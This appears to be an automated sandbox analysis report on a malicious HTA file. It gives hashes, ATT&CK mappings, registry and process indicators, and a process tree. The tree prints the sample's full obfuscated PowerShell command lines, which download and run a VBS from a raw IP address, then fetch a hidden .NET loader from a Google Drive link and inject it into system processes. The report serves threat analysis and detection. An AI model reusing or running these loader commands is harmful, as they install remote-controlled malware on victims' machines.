d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08/11/2024, 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
Size

207KB
MD5

21bf484c8fe4564e1f0e0fc0aa522199
SHA1

0bda2d5048d1555ef9ef50f4fd192c0838677c94
SHA256

d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6
SHA512

1dbf4a2f78b482b6d80eb48c9c2434a8907081a468c820ad9085fcede6134fe41c8c27a3e8f2ad7fa3f1d702e2b0904d885bfda8300ced9c4924c6e869e9baea
SSDEEP

96:43F97gSlqxRtwJPcEI/MOoMQbvfhKGAfQ:43F1OxvmUxevfU3Q

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 34 IoCs

flow	pid	Process
17	3824	poWERSHElL.EXe
22	2744	powershell.exe
25	2744	powershell.exe
29	2744	powershell.exe
43	4744	mshta.exe
46	4744	mshta.exe
48	4744	mshta.exe
52	4744	mshta.exe
53	4744	mshta.exe
54	4744	mshta.exe
56	4744	mshta.exe
57	4744	mshta.exe
58	4744	mshta.exe
59	4744	mshta.exe
60	4744	mshta.exe
67	4744	mshta.exe
70	4744	mshta.exe
71	4744	mshta.exe
72	4744	mshta.exe
73	4744	mshta.exe
75	4744	mshta.exe
77	4744	mshta.exe
78	4744	mshta.exe
79	4744	mshta.exe
80	4744	mshta.exe
82	4744	mshta.exe
84	4744	mshta.exe
85	4744	mshta.exe
86	4744	mshta.exe
87	4744	mshta.exe
89	4744	mshta.exe
91	4744	mshta.exe
92	4744	mshta.exe
93	4744	mshta.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2892	powershell.exe
2744	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3824	poWERSHElL.EXe
2476	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	drive.google.com
22	drive.google.com

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2744 set thread context of 720	2744	powershell.exe	109
PID 720 set thread context of 4744	720	aspnet_compiler.exe	84
PID 720 set thread context of 724	720	aspnet_compiler.exe	110
PID 724 set thread context of 4744	724	ieUnatt.exe	84
PID 724 set thread context of 440	724	ieUnatt.exe	115

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERSHElL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ieUnatt.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	ieUnatt.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	poWERSHElL.EXe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3824	poWERSHElL.EXe
3824	poWERSHElL.EXe
2476	powershell.exe
2476	powershell.exe
2892	powershell.exe
2892	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
720	aspnet_compiler.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
720	aspnet_compiler.exe
4744	mshta.exe
4744	mshta.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe
724	ieUnatt.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3824	poWERSHElL.EXe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 4744 wrote to memory of 3824	4744	mshta.exe	87
PID 4744 wrote to memory of 3824	4744	mshta.exe	87
PID 4744 wrote to memory of 3824	4744	mshta.exe	87
PID 3824 wrote to memory of 2476	3824	poWERSHElL.EXe	90
PID 3824 wrote to memory of 2476	3824	poWERSHElL.EXe	90
PID 3824 wrote to memory of 2476	3824	poWERSHElL.EXe	90
PID 3824 wrote to memory of 2836	3824	poWERSHElL.EXe	93
PID 3824 wrote to memory of 2836	3824	poWERSHElL.EXe	93
PID 3824 wrote to memory of 2836	3824	poWERSHElL.EXe	93
PID 2836 wrote to memory of 4816	2836	csc.exe	96
PID 2836 wrote to memory of 4816	2836	csc.exe	96
PID 2836 wrote to memory of 4816	2836	csc.exe	96
PID 3824 wrote to memory of 1252	3824	poWERSHElL.EXe	99
PID 3824 wrote to memory of 1252	3824	poWERSHElL.EXe	99
PID 3824 wrote to memory of 1252	3824	poWERSHElL.EXe	99
PID 1252 wrote to memory of 2892	1252	WScript.exe	100
PID 1252 wrote to memory of 2892	1252	WScript.exe	100
PID 1252 wrote to memory of 2892	1252	WScript.exe	100
PID 2892 wrote to memory of 2744	2892	powershell.exe	102
PID 2892 wrote to memory of 2744	2892	powershell.exe	102
PID 2892 wrote to memory of 2744	2892	powershell.exe	102
PID 2744 wrote to memory of 3648	2744	powershell.exe	107
PID 2744 wrote to memory of 3648	2744	powershell.exe	107
PID 2744 wrote to memory of 3648	2744	powershell.exe	107
PID 2744 wrote to memory of 4204	2744	powershell.exe	108
PID 2744 wrote to memory of 4204	2744	powershell.exe	108
PID 2744 wrote to memory of 4204	2744	powershell.exe	108
PID 2744 wrote to memory of 720	2744	powershell.exe	109
PID 2744 wrote to memory of 720	2744	powershell.exe	109
PID 2744 wrote to memory of 720	2744	powershell.exe	109
PID 2744 wrote to memory of 720	2744	powershell.exe	109
PID 2744 wrote to memory of 720	2744	powershell.exe	109
PID 2744 wrote to memory of 720	2744	powershell.exe	109
PID 4744 wrote to memory of 724	4744	mshta.exe	110
PID 4744 wrote to memory of 724	4744	mshta.exe	110
PID 4744 wrote to memory of 724	4744	mshta.exe	110
PID 724 wrote to memory of 440	724	ieUnatt.exe	115
PID 724 wrote to memory of 440	724	ieUnatt.exe	115

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4744
- C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe
  "C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'JEY2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSmtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVudktEYVVrdUgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWG9XdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRpaVh2ZEYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNWWNsQ2xJSEdibiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbk51UElVamZUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC4yMy83OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZXJsb3Zlci50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhncmVhdG1hZ2ljYWx0aGluZ3N3aXRoaGUudmJzIiwwLDApO3NUYXJULXNMRWVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZS52YnMi'+[ChAR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp" "c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4816
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCcxamdpbScrJ2FnZVVybCA9IDViSmh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIDViSjsxamd3ZWJDbGllbnQgPSBOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzFqJysnZ2ltYWdlQnl0ZXMgPSAxamd3ZWJDbGllbnQuRG93bmxvYWREYXRhKDFqZ2ltYWdlVXJsKTsxamdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOicrJzpVVEY4LkdldFN0cmluZygxamdpbWFnZUJ5JysndGVzKTsxamdzdGFydEZsYWcgPSAnKyc1Yko8PEJBU0U2NF9TVEFSVD4+NWJKOzFqZ2VuZEZsYWcgPSA1Yko8PCcrJ0JBU0U2NF9FTkQ+PjViSjsxamdzdGFydEluZGV4ID0nKycgMWpnaW1hZ2VUZXh0LicrJ0knKyduZGV4T2YoMWpnc3RhcnRGbGFnKTsxamdlbmRJbmRleCA9IDFqZ2knKydtYWdlVGV4dC5JbmRleE8nKydmKDFqZ2VuZEZsYWcpOzFqZ3N0YXJ0SW5kZXggLWdlICcrJzAgLWFuZCAxamdlbmRJbmRleCAtZ3QgMWpnc3RhcnRJbmRleDsxamdzdGFydEluZGV4ICs9IDFqZ3N0YXJ0RmxhZy5MZW5ndGg7MWpnYmFzZTY0JysnTGVuZ3RoID0gMWpnZW5kSW5kZXggLSAxamdzdGFydEluZGV4OzFqZ2JhJysnc2U2NENvbW1hbmQgPSAxamdpbWFnZVRleHQuU3Vic3RyaW5nJysnKDFqZ3N0YXJ0SW5kZXgsIDFqZ2Jhc2U2NExlbmd0aCk7MWpnYmFzZTY0UmV2ZScrJ3JzZWQgPSAtam9pbiAoMWpnYmFzZTY0Q29tbWEnKyduZC5Ub0NoYXJBcnJheSgpIDE1biBGb3JFYWNoLU9iamVjdCB7IDFqZ18gfSlbLTEuLi0oMWpnYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTsxamdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nKDFqZ2Jhc2U2NFJldmVyc2VkKTsxamdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06JysnOkxvYWQoMWpnY29tbWFuZEJ5dGVzKTsxamd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDViSlZBSTViSik7MWpndmFpTWV0aG8nKydkLkludm9rZSgxamdudWxsLCBAKDViSnR4dC5GQ0RSVy85Ny8zMi40LjM3MS43MDEvLzpwdHRoNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YicrJ0pkZXNhdGl2YWRvNWJKLCA1Ykphc3BuZXRfY29tcGlsZXI1YkosIDViSmRlc2F0aXZhZG81YkosIDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSjE1YkosNWJKZGVzYXRpdmFkbzViSikpOycpLlJlcGxhY0UoJzViSicsW1NUcklOZ11bQ2hhUl0zOSkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdNTMrW0NoYVJdMTEwKSxbU1RySU5nXVtDaGFSXTEyNCkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdMTA2K1tDaGFSXTEwMyksJyQnKXwgJiAoKGd2ICcqbWRyKicpLm5hTWVbMywxMSwyXS1KT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2892
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2744
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:3648
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:4204
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:720
- C:\Windows\SysWOW64\ieUnatt.exe
  "C:\Windows\SysWOW64\ieUnatt.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\poWERSHElL.EXe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
ce1bcfc9190c6cfda08148fb743882a2

SHA1
23a4d112625e8691f4347f3b281fe3b14ad15e92

SHA256
b66a07448dc9682b36c3f6ee59fd713a98fb78af01d20ba6faf6b19412ce1556

SHA512
862da3622fb6ff94e70da2b7efd139eeab8041fb911777f5140a8a9d3d3020d64a5d48dbfbb27ad9e20baa66c8fb2b309ea7c7f36ecb07be5c3c2a943668c0ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7eb358f916ead42489c03b8d0e109df4

SHA1
1cb6bbf55dec6ff98dd9064704d5329384472caf

SHA256
207ed2190f1c5d0bad439c5c09ea1129c14f71edbdc922468dee9b960bce8d9f

SHA512
5641ea86ebd53afb29e28d5b63f825636dc1855f4ed1d52f8a302ab7b8c5abe3f2f661ba80cdc2a9cba250a0088d3e0c7620ae88e5d9ae64fd7dae1cfb84b178

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.dll

Filesize
3KB

MD5
e32db995d7c04aa9abc2adb3cb78e3b6

SHA1
c761f8e511f66e5cc2cf4fba9096ae8be53d0dac

SHA256
2b97843d7061a685d3a58b55ece4a03031f64f3b818622776f2050251adb8bda

SHA512
ffcf13696ba920be2eac92bacc60fb9975200d1c8343946a6907588fa966bca84dcb375c236fa7682740550e528f29a5ebd3377e6c7ab67988e9e01c8aadfb93

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp

Filesize
1KB

MD5
5ac3e7b2c8b665309085844070338689

SHA1
d227ed68e70ffd96cdb3205ee8c8cf9501e9511a

SHA256
dff206519b65ae94d2078dcf7db3378911060aa2598f309ccaef16b316768b44

SHA512
81b017d2f40d60d2022d0409bcd62a04ac35f607b6499e8880fc3b4d83e7d0aa215b27bff8503a61d09cf939b5d83a714d897d0c33ccf307b81f9f101820201c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tinfclgi.1a0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs

Filesize
138KB

MD5
3a172f4d749a3cf2a42e0b7df638c8d3

SHA1
071d3b7db5a649ec3252af5b5a21ed047e71c785

SHA256
fe03066a9d3659d5f1e5941c7a73646780d55d15a57a9dde5901f469db2ead72

SHA512
30cc1c96d8cae17800f33f63d7ef8965536051ee7ec683b45e5c62079bf9487785ccc9b8ae8ab073f25f9059f1bbf84f73f8c8ff68c807c0e7007d597dced0d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.0.cs

Filesize
480B

MD5
02801ca1be5cf5616a9f398c85c263db

SHA1
e9000f0b5cd0dceb296fb59f9ed2c85717666377

SHA256
6d63144887d63ca3c8794b18c2e2283a7f5e6fdc5355fb24c0c3e7d11a172586

SHA512
4a27658c15203dd2122759a70db7f2917eb7a8899f9590f80a01b95d55a0631d0fce21d1ca6c9ec4111aabb7d9bdb9396f6483e42bb10850e9a9305d21616902

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline

Filesize
369B

MD5
9f189319c7026f4c8c2bc274b31dcbc1

SHA1
3d7cf616092e9342ffe58dbf0141a5e897c0c821

SHA256
4c87877673281431e8360baad648f64cdd3492b8959830f13c4350c0ce5ea398

SHA512
f017ba488a6104f6eeed822944c73a5d3e69b214efe71a53876e1fd1fa4fb331d3d0cc64af14daa7b871ab357bce5047efd8a01942e153a66c7765360a3e6fba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP

Filesize
652B

MD5
f26b3a26ab9c4a46fde242aaaca9a332

SHA1
2dbb75a8f5c366597503e49e17225fea551e4aef

SHA256
6c13e7351b8e2dab0b4ca221f593ca473762d9b78d1bfb3a0d3f6c8e1f662270

SHA512
9531d901c1958a367bcf0f0426f30035f7ef681dcb94a12bd3bce25cbc92af4f35a3625382e3f57eb7baa5158fbde5b64e35beaad82199eae18aee4daa07e135

Download Submit
memory/440-117-0x0000023B33A20000-0x0000023B33B37000-memory.dmp

Filesize
1.1MB

Download
memory/720-104-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/724-108-0x0000000000800000-0x0000000000843000-memory.dmp

Filesize
268KB

Download
memory/724-109-0x0000000000800000-0x0000000000843000-memory.dmp

Filesize
268KB

Download
memory/2476-29-0x00000000078D0000-0x0000000007902000-memory.dmp

Filesize
200KB

Download
memory/2476-41-0x0000000007910000-0x00000000079B3000-memory.dmp

Filesize
652KB

Download
memory/2476-42-0x0000000008090000-0x000000000870A000-memory.dmp

Filesize
6.5MB

Download
memory/2476-43-0x0000000007A40000-0x0000000007A5A000-memory.dmp

Filesize
104KB

Download
memory/2476-44-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

Filesize
40KB

Download
memory/2476-45-0x0000000007CD0000-0x0000000007D66000-memory.dmp

Filesize
600KB

Download
memory/2476-46-0x0000000007C40000-0x0000000007C51000-memory.dmp

Filesize
68KB

Download
memory/2476-47-0x0000000007C70000-0x0000000007C7E000-memory.dmp

Filesize
56KB

Download
memory/2476-48-0x0000000007C80000-0x0000000007C94000-memory.dmp

Filesize
80KB

Download
memory/2476-49-0x0000000007D90000-0x0000000007DAA000-memory.dmp

Filesize
104KB

Download
memory/2476-50-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

Filesize
32KB

Download
memory/2476-40-0x00000000078B0000-0x00000000078CE000-memory.dmp

Filesize
120KB

Download
memory/2476-30-0x000000006D480000-0x000000006D4CC000-memory.dmp

Filesize
304KB

Download
memory/2744-103-0x0000000007E60000-0x0000000007EFC000-memory.dmp

Filesize
624KB

Download
memory/2744-102-0x0000000007D00000-0x0000000007E58000-memory.dmp

Filesize
1.3MB

Download
memory/2892-91-0x0000000005B60000-0x0000000005EB4000-memory.dmp

Filesize
3.3MB

Download
memory/3824-81-0x0000000070BC0000-0x0000000071370000-memory.dmp

Filesize
7.7MB

Download
memory/3824-19-0x0000000005C30000-0x0000000005C7C000-memory.dmp

Filesize
304KB

Download
memory/3824-72-0x0000000070BC0000-0x0000000071370000-memory.dmp

Filesize
7.7MB

Download
memory/3824-73-0x0000000006F60000-0x0000000006F82000-memory.dmp

